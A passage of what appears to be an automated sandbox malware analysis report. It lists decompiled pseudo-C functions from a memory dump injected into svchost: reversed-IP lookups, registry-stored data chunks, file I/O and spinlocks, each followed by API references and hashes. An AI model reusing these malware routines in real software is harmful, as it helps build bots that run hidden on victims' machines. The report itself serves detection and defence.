                                                                                                                                  • 0 v, xrefs: 0251BFD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
                                                                                                                                  • API String ID: 2424974917-2279882658
                                                                                                                                  • Opcode ID: 50e7fa82caab7af27740539f7d705722911cddba1042fe96d16e1be89c0e11ac
                                                                                                                                  • Instruction ID: 40cc7f654947e467dc522e581ec8699a676a9075e181151f590f8a9a22d51e50
                                                                                                                                  • Opcode Fuzzy Hash: 50e7fa82caab7af27740539f7d705722911cddba1042fe96d16e1be89c0e11ac
                                                                                                                                  • Instruction Fuzzy Hash: BA11B672101100EFDB529EA9CD44E567FA6FB88318B34819CF2188A166D633C827EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02511C5F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02511C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0251ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0251EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E02512684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0251EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E02512684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0251ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}















                                                                                                                                  0x02511c60
                                                                                                                                  0x02511c64
                                                                                                                                  0x02511c6a
                                                                                                                                  0x02511c71
                                                                                                                                  0x02511c74
                                                                                                                                  0x02511c86
                                                                                                                                  0x02511c8c
                                                                                                                                  0x02511d1c
                                                                                                                                  0x02511d1c
                                                                                                                                  0x02511d1e
                                                                                                                                  0x02511d1e
                                                                                                                                  0x02511d21
                                                                                                                                  0x02511d21
                                                                                                                                  0x02511d23
                                                                                                                                  0x02511d24
                                                                                                                                  0x02511d2a
                                                                                                                                  0x02511d2e
                                                                                                                                  0x02511d30
                                                                                                                                  0x02511d30
                                                                                                                                  0x02511d33
                                                                                                                                  0x02511d33
                                                                                                                                  0x02511d35
                                                                                                                                  0x02511d36
                                                                                                                                  0x02511d42
                                                                                                                                  0x02511d6b
                                                                                                                                  0x02511d7e
                                                                                                                                  0x02511d88
                                                                                                                                  0x02511d88
                                                                                                                                  0x02511d8b
                                                                                                                                  0x02511d95
                                                                                                                                  0x02511d95
                                                                                                                                  0x02511c96
                                                                                                                                  0x02511c9d
                                                                                                                                  0x02511ca4
                                                                                                                                  0x02511cab
                                                                                                                                  0x02511cae
                                                                                                                                  0x02511cb3
                                                                                                                                  0x02511cbd
                                                                                                                                  0x02511cd2
                                                                                                                                  0x02511cd2
                                                                                                                                  0x02511ce1
                                                                                                                                  0x02511cea
                                                                                                                                  0x02511cef
                                                                                                                                  0x02511cf4
                                                                                                                                  0x02511cfe
                                                                                                                                  0x02511cfe
                                                                                                                                  0x02511d04
                                                                                                                                  0x02511d0a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511d14
                                                                                                                                  0x02511d1a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02511d1a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf
                                                                                                                                  • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                                                                  • API String ID: 2111968516-120809033
                                                                                                                                  • Opcode ID: e7d4e6d02ddbfff0b8f28135245d309732f34f8464b6ad17688f960faf03137b
                                                                                                                                  • Instruction ID: 333b550b46d9ed5bb7f581cd7c956d0ba4db0444bfcc62ab3ce60902ee431edc
                                                                                                                                  • Opcode Fuzzy Hash: e7d4e6d02ddbfff0b8f28135245d309732f34f8464b6ad17688f960faf03137b
                                                                                                                                  • Instruction Fuzzy Hash: 31418B729042999FEB21CF788D44BEE3FE9AF49310F240156FEA4D3181D634DA05CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251E654 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0251DD05();
				_t41 = 0x25220e8;
				_t55 =  *0x25220e8 - 0x25220e8; // 0x2a1f068
				if(_t55 == 0) {
					L9:
					_t53 = E0251EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E02513E8F(0x25220e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x25220e4;
						__eflags =  *0x25220e4 - _t42; // 0x2a05278
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0251DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t21 = _t51 + 0x10; // 0x25220f8
								_t34 = lstrcmpA(_t21, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x25220e4;
						} while ( *_t42 != 0x25220e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x761b43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x25220e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                                                                  0x0251e65a
                                                                                                                                  0x0251e664
                                                                                                                                  0x0251e666
                                                                                                                                  0x0251e66c
                                                                                                                                  0x0251e6a9
                                                                                                                                  0x0251e6b0
                                                                                                                                  0x0251e6b5
                                                                                                                                  0x0251e6c8
                                                                                                                                  0x0251e6d0
                                                                                                                                  0x0251e6d3
                                                                                                                                  0x0251e6d8
                                                                                                                                  0x0251e6de
                                                                                                                                  0x0251e6f5
                                                                                                                                  0x0251e6e0
                                                                                                                                  0x0251e6e5
                                                                                                                                  0x0251e6e9
                                                                                                                                  0x0251e6ef
                                                                                                                                  0x0251e6ef
                                                                                                                                  0x0251e6f9
                                                                                                                                  0x0251e6f9
                                                                                                                                  0x0251e6fe
                                                                                                                                  0x0251e704
                                                                                                                                  0x0251e741
                                                                                                                                  0x0251e743
                                                                                                                                  0x0251e6b9
                                                                                                                                  0x0251e6b9
                                                                                                                                  0x0251e6c4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e706
                                                                                                                                  0x0251e706
                                                                                                                                  0x0251e706
                                                                                                                                  0x0251e709
                                                                                                                                  0x0251e70b
                                                                                                                                  0x0251e70e
                                                                                                                                  0x0251e715
                                                                                                                                  0x0251e715
                                                                                                                                  0x0251e715
                                                                                                                                  0x0251e718
                                                                                                                                  0x0251e71b
                                                                                                                                  0x0251e72c
                                                                                                                                  0x0251e72c
                                                                                                                                  0x0251e72c
                                                                                                                                  0x0251e732
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e736
                                                                                                                                  0x0251e71e
                                                                                                                                  0x0251e722
                                                                                                                                  0x0251e728
                                                                                                                                  0x0251e72a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e72a
                                                                                                                                  0x0251e710
                                                                                                                                  0x0251e713
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e737
                                                                                                                                  0x0251e737
                                                                                                                                  0x0251e739
                                                                                                                                  0x0251e739
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e706
                                                                                                                                  0x0251e6b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e66e
                                                                                                                                  0x0251e66e
                                                                                                                                  0x0251e66e
                                                                                                                                  0x0251e676
                                                                                                                                  0x0251e684
                                                                                                                                  0x0251e68f
                                                                                                                                  0x0251e699
                                                                                                                                  0x0251e686
                                                                                                                                  0x0251e686
                                                                                                                                  0x0251e686
                                                                                                                                  0x0251e69b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e69b
                                                                                                                                  0x0251e69d
                                                                                                                                  0x0251e69d
                                                                                                                                  0x0251e69f
                                                                                                                                  0x0251e6a1
                                                                                                                                  0x0251e6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0251DD05: GetTickCount.KERNEL32 ref: 0251DD0F
                                                                                                                                    • Part of subcall function 0251DD05: InterlockedExchange.KERNEL32(025236B4,00000001), ref: 0251DD44
                                                                                                                                    • Part of subcall function 0251DD05: GetCurrentThreadId.KERNEL32 ref: 0251DD53
                                                                                                                                  • lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,02515EC1), ref: 0251E693
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,02515EC1), ref: 0251E6E9
                                                                                                                                  • lstrcmpA.KERNEL32(89ABCDEF,00000008,?,761B43E0,00000000,?,02515EC1), ref: 0251E722
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                                                                  • String ID: 89ABCDEF
                                                                                                                                  • API String ID: 3343386518-71641322
                                                                                                                                  • Opcode ID: 7c80f0e8c5dc92ee978be163f562ea6916d69298b61538daf5d1bf125291f932
                                                                                                                                  • Instruction ID: d9a1d53dbc5822a758e1543cf8ec3ff9af9a3cc65a2ed2706ab774864afdaaee
                                                                                                                                  • Opcode Fuzzy Hash: 7c80f0e8c5dc92ee978be163f562ea6916d69298b61538daf5d1bf125291f932
                                                                                                                                  • Instruction Fuzzy Hash: A331EF31A00352DFFB318F60E885BA77BE4BF06324F54482AED458B581D770E888CB88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251E095 Relevance: 6.1, APIs: 4, Instructions: 92registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0251EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0251F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0251F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                                                                  0x0251e09c
                                                                                                                                  0x0251e0ba
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e172
                                                                                                                                  0x0251e0c3
                                                                                                                                  0x0251e0c6
                                                                                                                                  0x0251e0c9
                                                                                                                                  0x0251e0cc
                                                                                                                                  0x0251e0cc
                                                                                                                                  0x0251e0ce
                                                                                                                                  0x0251e0cf
                                                                                                                                  0x0251e0d7
                                                                                                                                  0x0251e0d9
                                                                                                                                  0x0251e0df
                                                                                                                                  0x0251e0e3
                                                                                                                                  0x0251e0e3
                                                                                                                                  0x0251e0ec
                                                                                                                                  0x0251e0f1
                                                                                                                                  0x0251e0f4
                                                                                                                                  0x0251e0f9
                                                                                                                                  0x0251e13f
                                                                                                                                  0x0251e149
                                                                                                                                  0x0251e158
                                                                                                                                  0x0251e161
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e0fb
                                                                                                                                  0x0251e102
                                                                                                                                  0x0251e104
                                                                                                                                  0x0251e104
                                                                                                                                  0x0251e110
                                                                                                                                  0x0251e115
                                                                                                                                  0x0251e12f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e131
                                                                                                                                  0x0251e134
                                                                                                                                  0x0251e136
                                                                                                                                  0x0251e13b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e13b
                                                                                                                                  0x0251e13d
                                                                                                                                  0x00000000
                                                                                                                                  0x0251e13d

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,0251E2A3,00000000,00000000,00000000,00020106,00000000,0251E2A3,00000000,000000E4), ref: 0251E0B2
                                                                                                                                  • RegSetValueExA.ADVAPI32(0251E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,025222F8), ref: 0251E127
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0251E2A3,?,?,?,?,?,000000C8,025222F8), ref: 0251E158
                                                                                                                                  • RegCloseKey.ADVAPI32(0251E2A3,?,?,?,?,000000C8,025222F8,?,?,?,?,?,?,?,?,0251E2A3), ref: 0251E161
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667537340-0
                                                                                                                                  • Opcode ID: 397c4b81a92c8660da1f8496a9e9e92a9e92b9734b61d803f90d8799e692c6a6
                                                                                                                                  • Instruction ID: 7c9a0e75d72783625c029eaafe73fafd593a98334e0f2609041fd1118f595f42
                                                                                                                                  • Opcode Fuzzy Hash: 397c4b81a92c8660da1f8496a9e9e92a9e92b9734b61d803f90d8799e692c6a6
                                                                                                                                  • Instruction Fuzzy Hash: 0C213E71E40219BBEF219EA4DC89EEE7FB9EF09750F404061FD04A6150E7718A58DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02513F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02513F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x02513f1e
                                                                                                                                  0x02513f22
                                                                                                                                  0x02513f27
                                                                                                                                  0x02513f2b
                                                                                                                                  0x02513f2e
                                                                                                                                  0x02513f3e
                                                                                                                                  0x02513f4c
                                                                                                                                  0x02513f7c
                                                                                                                                  0x02513f7f
                                                                                                                                  0x02513f86
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f86
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f83
                                                                                                                                  0x02513f59
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513f5f
                                                                                                                                  0x02513f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,0251A3C7,00000000,00000000,000007D0,00000001), ref: 02513F44
                                                                                                                                  • GetLastError.KERNEL32 ref: 02513F4E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 02513F5F
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02513F72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 63ca96bb7d14d971b14b69973adbff35363cacfa7289306758a9c944479c3fb9
                                                                                                                                  • Instruction ID: 8900fbf2f225a41f65acba4cb6a59942b30ff7e495d75621cbea5b51b9b44f76
                                                                                                                                  • Opcode Fuzzy Hash: 63ca96bb7d14d971b14b69973adbff35363cacfa7289306758a9c944479c3fb9
                                                                                                                                  • Instruction Fuzzy Hash: DA01D772911109ABEF11DE90D944BEE7BBCFB04365F504495FA01E2080D7349A689BA9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02513F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02513F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                                                                  0x02513f92
                                                                                                                                  0x02513f96
                                                                                                                                  0x02513f9b
                                                                                                                                  0x02513f9f
                                                                                                                                  0x02513fa2
                                                                                                                                  0x02513fb2
                                                                                                                                  0x02513fc0
                                                                                                                                  0x02513ff0
                                                                                                                                  0x02513ff3
                                                                                                                                  0x02513ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x02513ffa
                                                                                                                                  0x00000000
                                                                                                                                  0x02513ff7
                                                                                                                                  0x02513fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02513fd3
                                                                                                                                  0x02513fee
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,0251A3C7,00000000,00000000,000007D0,00000001), ref: 02513FB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 02513FC2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 02513FD3
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 02513FE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: bb0e6b2e717fef1caa3ca12ae85e353f12d78a7e3c8493741cb41d5ee58c3d37
                                                                                                                                  • Instruction ID: f24c1aa8f1953c4cb9ed24e4a9bfec386da7f97c518d22f808fd324f1ec1586a
                                                                                                                                  • Opcode Fuzzy Hash: bb0e6b2e717fef1caa3ca12ae85e353f12d78a7e3c8493741cb41d5ee58c3d37
                                                                                                                                  • Instruction Fuzzy Hash: 3701297391110AABEF11DF90D945BEE3BBCFB04355F404451F902E2080D738DA288BB9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0251A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0251A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                                                                  0x0251a4dd
                                                                                                                                  0x0251a4df
                                                                                                                                  0x0251a4f7
                                                                                                                                  0x0251a4fa
                                                                                                                                  0x0251a4fe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a4e6
                                                                                                                                  0x0251a4ed
                                                                                                                                  0x0251a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a4f1
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a4ed
                                                                                                                                  0x0251a504

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4D1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4E4
                                                                                                                                  • Sleep.KERNEL32(00000000,?,0251C2E9,0251C4E0,00000000,localcfg,?,0251C4E0,02523588,02518810), ref: 0251A4F1
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 0251A4FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: b89581744301b254275237a0ca0daba403e5367349e033586f7154dc7de1e100
                                                                                                                                  • Instruction ID: 67802e1be0ae70881c2584d7a5b1a27f5a4c4e3d7578acccd92ff61e66ddf80d
                                                                                                                                  • Opcode Fuzzy Hash: b89581744301b254275237a0ca0daba403e5367349e033586f7154dc7de1e100
                                                                                                                                  • Instruction Fuzzy Hash: 6EE0263324321457EA106BA5AC84F7A3788BB4A761F430421FB04D31C1C65AA859C1BE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02514E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02514E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







